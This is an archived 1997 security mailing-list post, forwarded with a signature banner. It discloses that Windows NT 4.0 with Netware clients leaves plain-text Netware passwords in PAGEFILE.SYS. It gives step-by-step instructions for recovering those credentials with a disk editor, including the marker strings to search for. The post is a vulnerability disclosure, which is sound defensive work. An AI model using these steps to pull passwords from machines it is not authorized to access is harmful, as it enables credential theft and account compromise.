[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[NTSEC] NT Displays Plain-Text Netware Passwords (fwd)
=====================================Kaos=Keraunos=Kybernetos==============
.+.^.+.| Ray Arachelian | "If you're gonna die, die with your|./|\.
..\|/..|[email protected]|boots on; If you're gonna try, just |/\|/\
<--*-->| ------------------ |stick around; Gonna cry? Just move along|\/|\/
../|\..| "A toast to Odin, |you're gonna die, you're gonna die!" |.\|/.
.+.v.+.|God of screwdrivers"| --Iron Maiden "Die With Your Boots on"|.....
======================== http://www.sundernet.com =========================
For with those which eternal lie, with strange eons even death may die.
---------- Forwarded message ----------
Date: Thu, 24 Apr 1997 01:37:49 -0500
From: Patrick Hayden <[email protected]>
To: [email protected]
Subject: [NTSEC] NT Displays Plain-Text Netware Passwords
Windows NT 4.0, with Microsoft's Client Services for Netware, or
Novell's IntraNetware Client for Windows NT, writes plain-text user-id
and password information to PAGEFILE.SYS. The user-id and password
apply to Netware, however, users commonly use the same logon information
for both NT and Netware. It is possible to then recover the plain-text
information by using a disk editor.
Tests have been performed (with more pending) on these systems:
Windows NT Workstation 4.0 w/SP1 and IntraNetware Client for NT (970214)
Pent. 133 Laptop 24MB RAM 50MB PAGEFILE.SYS
Windows NT Workstation 4.0 w/SP1 and Microsoft Client Services for
Netware
Dual Pent 166 64MB RAM 80MB PAGEFILE.SYS
Novell Netware 4.11 Server
1. Set /MAXMEM=12 in BOOT.INI so as to force swapping.
2. Load NT; Authenticate to NT and Netware (I used the same ID and
Password for both systems.); Verify connection by mapping a drive.
3. To ensure that sufficient swapping takes place, run a large program
(this forces the user-id and password information stored in RAM to be
placed into PAGEFILE.SYS.)
4. Exit NT; Boot to DOS; diskedit PAGEFILE.SYS
5. Search for one of the following strings (do NOT include the ""
items):
IntraNetware Client:
NWUserName="user-id"
WlMprNotifyPassword="password"
"UserName" (if the username is alone, the password will follow
very closely)
Client Services for Netware
nwcs"password" (the password is all CAPS and will immediately
follow nwcs)
In a "real-life" environment, most likely there will be enough swapping
on the system that setting the /MAXMEM switch will be unnecessary. The
switch is only to help confirm that this hole exits.
If anyone has any knowledge of this, please post it to the list.
Patrick Hayden
Security Consultant � Ernst & Young, LLP
[email protected]